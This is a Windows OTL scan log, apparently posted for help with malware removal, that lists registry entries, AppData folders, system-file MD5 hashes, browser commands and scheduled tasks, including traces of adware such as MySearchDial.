[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64"" = C:\Windows\SysNative\shell32.dll -- [2014.04.06 18:31:39 | 021,268,952 | ---- | M] (Microsoft Corporation)"ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]"" = %SystemRoot%\system32\shell32.dll -- [2014.04.06 17:22:20 | 018,755,672 | ---- | M] (Microsoft Corporation)"ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-

D6A79037F57F}\InProcServer32] /64"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013.08.22 11:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation)"ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]"" = %systemroot%\system32\wbem\fastprox.dll -- [2013.08.22 04:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation)"ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013.08.22 11:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation)"ThreadingModel" = Both [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] [color=#E56717]========== LOP Check ==========[/color] [2014.03.17 13:30:36 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\acer[2014.09.02 22:28:48 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\FileZilla[2014.03.17 22:55:06 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\mysearchdial[2014.06.05 14:34:06 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Notepad++[2014.03.24 21:08:50 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\OpenOffice[2014.03.17 23:00:02 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Optimizer Pro[2014.03.19 16:46:03 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\PhotoScape[2014.03.20 17:15:53 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\ValueApps[2014.05.13 22:24:21 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\WildTangent[2014.09.09 13:51:35 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\ZHP [color=#E56717]========== Purity Check ==========[/color] [color=#E56717]========== Custom Scans ==========[/color] [color=#A23BEC]< MD5 for: EXPLORER.EXE >[/color][2014.03.04 13:16:50 | 002,088,160 | ---- | M] (Microsoft Corporation) MD5=119E091B5386379BC5AA598BE9440C75 -- C:\Windows\SysWOW64\explorer.exe[2014.03.04 13:16:50 | 002,088,160 | ---- | M] (Microsoft Corporation) MD5=119E091B5386379BC5AA598BE9440C75 -- C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.17039_none_4d02a60381e74c58\explorer.exe[2014.05.16 21:12:26 | 000,336,576 | ---- | M] () MD5=201E2AB1C87503398EFAE7D32AF29FFE-- C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.16384_none_4273071d4db37533\explorer.exe[2014.05.16 22:21:30 | 000,015,546 | ---- | M] () MD5=347EFF7EC89C3EB4F72F2408E1C4E16D -- C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.17031_none_4cfaa3b381ee81a0\explorer.exe[2014.05.16 22:21:26 | 000,238,918 | ---- | M] ()

MD5=5177BB4FECDDB9CDBCF10EF65916968D -- C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.16441_none_4ceff22781f6788c\explorer.exe[2014.05.16 22:21:17 | 000,268,164 | ---- | M] () MD5=578A251C234E51BC6B9D684480EEB9DB-- C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.16384_none_4cc7b16f8214372e\explorer.exe[2014.05.16 21:12:36 | 000,169,957 | ---- | M] () MD5=6D919C26DCB567396CD2E119B8E4310E-- C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.17031_none_42a5f9614d8dbfa5\explorer.exe[2014.05.16 22:21:22 | 000,239,123 | ---- | M] () MD5=7B546CB045C2A84D26A8D2FE07F9F98C-- C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.16408_none_4d2233dd81cfba29\explorer.exe[2014.03.04 14:25:49 | 002,373,784 | ---- | M] (Microsoft Corporation) MD5=81394C91B7B5A7C799E249AE82491F13 -- C:\Windows\explorer.exe[2014.03.04 14:25:49 | 002,373,784 | ---- | M] (Microsoft Corporation) MD5=81394C91B7B5A7C799E249AE82491F13 -- C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.17039_none_42adfbb14d868a5d\explorer.exe[2014.05.16 21:12:30 | 000,284,534 | ---- | M] () MD5=D1EF5DE70183FB717B5FC4593A0E46BD -- C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.16408_none_42cd898b4d6ef82e\explorer.exe[2014.05.16 21:12:33 | 000,283,735 | ---- | M] () MD5=FA98C5D746E7C9E0912E88AC44FF9926 -- C:\Windows\WinSxS\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.3.9600.16441_none_429b47d54d95b691\explorer.exe [color=#A23BEC]< MD5 for: SVCHOST.EXE >[/color][2013.08.22 07:30:58 | 000,031,552 | ---- | M] (Microsoft Corporation) MD5=425E22D9F5C01616AFC92987791B19E9 -- C:\Windows\SysWOW64\svchost.exe[2013.08.22 07:30:58 | 000,031,552 | ---- | M] (Microsoft Corporation) MD5=425E22D9F5C01616AFC92987791B19E9 -- C:\Windows\WinSxS\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.3.9600.16384_none_4a5b1e2820e75323\svchost.exe[2013.08.22 14:45:17 | 000,037,768 | ---- | M] (Microsoft Corporation) MD5=E4CA434F251681590D0538BC21C32D2F -- C:\Windows\SysNative\svchost.exe[2013.08.22 14:45:17 | 000,037,768 | ---- | M] (Microsoft Corporation) MD5=E4CA434F251681590D0538BC21C32D2F -- C:\Windows\WinSxS\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.3.9600.16384_none_a679b9abd944c459\svchost.exe [color=#A23BEC]< MD5 for: USERINIT.EXE >[/color][2013.08.22 12:03:12 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=08C191B2917862BE90C33E31CB6B6D79 -- C:\Windows\SysNative\userinit.exe[2013.08.22 12:03:12 | 000,025,088 | ---- | M] (Microsoft Corporation) MD5=08C191B2917862BE90C33E31CB6B6D79 -- C:\Windows\WinSxS\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.3.9600.16384_none_cce71a20a5a6fe7f\userinit.exe[2013.08.22 04:54:12 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=41636F77AD6D9A396EA34E4786B96F2B -- C:\Windows\SysWOW64\userinit.exe[2013.08.22 04:54:12 | 000,021,504 | ---- | M] (Microsoft Corporation) MD5=41636F77AD6D9A396EA34E4786B96F2B -- C:\Windows\WinSxS\x86_microsoft-windows-userinit_31bf3856ad364e35_6.3.9600.16384_none_70c87e9ced498d49\userinit.exe [color=#A23BEC]< MD5 for: WININIT.EXE >[/color][2013.08.22 11:58:29 | 000,144,384 | ---- | M] (Microsoft Corporation) MD5=48CFA7BE561A7BE144C29BB912055016 -- C:\Windows\SysNative\wininit.exe[2013.08.22 11:58:29 | 000,144,384 | ---- | M] (Microsoft Corporation)

MD5=48CFA7BE561A7BE144C29BB912055016 -- C:\Windows\WinSxS\amd64_microsoft-windows-wininit_31bf3856ad364e35_6.3.9600.16384_none_21b118d9d847ad16\wininit.exe [color=#A23BEC]< MD5 for: WINLOGON.EXE >[/color][2014.02.22 11:45:48 | 000,562,176 | ---- | M] (Microsoft Corporation) MD5=306EB21E5B480AE9065EA55AC8C35936 -- C:\Windows\SysNative\winlogon.exe[2014.02.22 11:45:48 | 000,562,176 | ---- | M] (Microsoft Corporation) MD5=306EB21E5B480AE9065EA55AC8C35936 -- C:\Windows\WinSxS\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.3.9600.17031_none_60b45365a8c2ccdb\winlogon.exe[2014.05.16 21:58:45 | 000,089,459 | ---- | M] () MD5=E40DC8DF924E02F04F3620DBAC1ACE31 -- C:\Windows\WinSxS\amd64_microsoft-windows-winlogon_31bf3856ad364e35_6.3.9600.16384_none_60816121a8e88269\winlogon.exe [color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color][2007.11.07 08:03:18 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe [color=#A23BEC]< %ALLUSERSPROFILE%\Application Data\*. >[/color] [color=#A23BEC]< %ALLUSERSPROFILE%\Application Data\*.exe /s >[/color] [color=#A23BEC]< %APPDATA%\*. >[/color][2014.03.17 13:30:36 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\acer[2014.03.16 01:59:46 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Adobe[2014.03.16 02:01:14 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Atheros[2014.04.23 21:57:41 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\CyberLink[2014.09.02 22:28:48 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\FileZilla[2014.03.16 06:56:01 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Macromedia[2014.04.23 22:04:39 | 000,000,000 | --SD | M] -- C:\Users\Muller\AppData\Roaming\Microsoft[2014.03.17 18:18:22 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Mozilla[2014.03.17 22:55:06 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\mysearchdial[2014.03.21 22:49:21 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\NCH Software[2014.06.05 14:34:06 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Notepad++[2014.03.24 21:08:50 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\OpenOffice[2014.03.17 23:00:02 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Optimizer Pro[2014.03.19 16:46:03 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\PhotoScape[2014.09.09 17:25:00 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\Skype[2014.03.20 17:15:53 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\ValueApps[2014.05.13 22:24:21 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\WildTangent[2014.09.09 13:51:35 | 000,000,000 | ---D | M] -- C:\Users\Muller\AppData\Roaming\ZHP [color=#A23BEC]< %APPDATA%\*.exe /s >[/color][2007.11.27 09:41:32 | 000,405,504 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\NCH Software\Components\mp3el2\lame.exe[2012.06.04 16:10:30 | 001,487,678 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\NCH Software\Components\x264enc4\x264enc4.exe[2012.10.19 09:54:14 | 001,492,222 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\NCH Software\Components\x264enc5\x264enc5.exe[2014.05.13 22:24:23 | 004,294,240 | ---- | M] (WildTangent, Inc.) -- C:\Users\Muller\AppData\Roaming\WildTangent\Updater\GameConsole\GameConsole-4.0.34.25.exe[2012.11.29 03:52:32 | 000,049,824 | ---- | M] (WildTangent) --

C:\Users\Muller\AppData\Roaming\WildTangent\Updater\GameConsole\Park-{3ce3bd8d-6b46-499b-9d43-14c3ce3b8ea2}.exe[2014.05.13 22:24:39 | 001,024,304 | ---- | M] (WildTangent) -- C:\Users\Muller\AppData\Roaming\WildTangent\WildTangent Games\App\DPConfig\InstallTouchpoints-acer.exe[2014.05.13 22:24:39 | 000,000,174 | ---- | M] () -- C:\Users\Muller\AppData\Roaming\WildTangent\WildTangent Games\App\DPConfig\InstallTouchpoints-acer.exe_filedata[2012.11.29 03:52:32 | 000,572,064 | ---- | M] (WildTangent, Inc.) -- C:\Users\Muller\AppData\Roaming\WildTangent\WildTangent Games\App\Update\Updater.exe [color=#A23BEC]< %systemroot%\*. /mp /s >[/color] [color=#A23BEC]< %systemroot%\system32\*.dll /lockedfiles >[/color][2014.07.25 13:03:13 | 011,772,928 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b]-- C:\Windows\system32\ieframe.dll[2013.08.22 05:12:13 | 000,116,736 | ---- | M] (Microsoft Corporation)[b] Unable to obtain MD5[/b]-- C:\Windows\system32\iepeers.dll [color=#A23BEC]< %systemroot%\Tasks\*.job /lockedfiles >[/color] [color=#A23BEC]< %systemroot%\system32\drivers\*.sys /lockedfiles >[/color] [color=#A23BEC]< hklm\software\clients\startmenuinternet|command /rs >[/color]HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014.07.30 15:03:59 | 000,899,632 | ---- | M] (Mozilla Corporation)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014.07.30 15:03:59 | 000,899,632 | ---- | M] (Mozilla Corporation)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014.07.30 15:03:59 | 000,899,632 | ---- | M] (Mozilla Corporation)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" [2014.07.30 15:04:00 | 000,275,568 | ----| M] (Mozilla Corporation)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -preferences [2014.07.30 15:04:00 |000,275,568 | ---- | M] (Mozilla Corporation)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -safe-mode [2014.07.30 15:04:00 | 000,275,568 | ---- | M] (Mozilla Corporation)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --make-default-browser [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --hide-icons [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files

(x86)\Google\Chrome\Application\chrome.exe" --show-icons [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\Windows\System32\ie4uinit.exe" -showHKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\Windows\System32\ie4uinit.exe" -reinstallHKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\Windows\System32\ie4uinit.exe" -hideHKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2014.07.25 18:35:00 | 000,810,128 | ---- | M] (Microsoft Corporation)HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: C:\Program Files\Internet Explorer\iexplore.exe [2014.07.25 18:35:00 | 000,810,128 | ---- | M] (Microsoft Corporation) [color=#A23BEC]< hklm\software\clients\startmenuinternet|command /64 /rs >[/color]64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\UNINSTALL\HELPER.EXE" /HIDESHORTCUTS [2014.07.30 15:03:59 | 000,899,632| ---- | M] (Mozilla Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\UNINSTALL\HELPER.EXE" /SHOWSHORTCUTS [2014.07.30 15:03:59 | 000,899,632 | ---- | M] (Mozilla Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\UNINSTALL\HELPER.EXE" /SETASDEFAULTAPPGLOBAL [2014.07.30 15:03:59 | 000,899,632 | ---- | M] (Mozilla Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE" [2014.07.30 15:04:00 | 000,275,568 | ---- | M] (Mozilla Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE" -PREFERENCES [2014.07.30 15:04:00 | 000,275,568 | ---- | M] (Mozilla Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE" -SAFE-MODE [2014.07.30 15:04:00 | 000,275,568 | ---- | M] (Mozilla Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE" --MAKE-DEFAULT-BROWSER [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\PROGRAM FILES

(X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE" --HIDE-ICONS [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE" --SHOW-ICONS [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE" [2014.03.15 02:50:42 | 000,859,976 | ---- | M] (Google Inc.)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\SYSTEM32\IE4UINIT.EXE" -SHOW [2014.07.25 13:42:31 | 000,692,736 | ---- | M] (Microsoft Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\SYSTEM32\IE4UINIT.EXE" -REINSTALL [2014.07.25 13:42:31| 000,692,736 | ---- | M] (Microsoft Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\SYSTEM32\IE4UINIT.EXE" -HIDE [2014.07.25 13:42:31 | 000,692,736 | ---- | M] (Microsoft Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE" -EXTOFF [2014.07.25 18:35:00 | 000,810,128 | ---- | M] (Microsoft Corporation)64bit-HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE [2014.07.25 18:35:00 | 000,810,128 | ---- | M] (Microsoft Corporation) [color=#A23BEC]< nslookup http://www.google.fr /c >[/color]Serveur : fritz.boxAddress: 192.168.178.1 [color=#A23BEC]< >[/color][2013.08.22 16:45:54 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT[2014.03.17 22:31:29 | 000,001,002 | ---- | C] () -- C:\Windows\Tasks\Adobe Flash Player Updater.job[2014.03.17 22:55:06 | 000,000,316 | ---- | C] () -- C:\Windows\Tasks\MySearchDial.job[2014.03.19 15:45:50 | 000,001,084 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job[2014.03.19 15:45:50 | 000,001,088 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job [color=#A23BEC]< >[/color] [color=#A23BEC]< >[/color] [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 220 bytes -> C:\Users\Muller\SkyDrive:ms-properties

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >

Documents

Rapport extras OTL OTL Extras logfile created on: 09.09 ... · Rapport extras OTL OTL Extras logfile created on: 09.09.2014 17:23:31 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder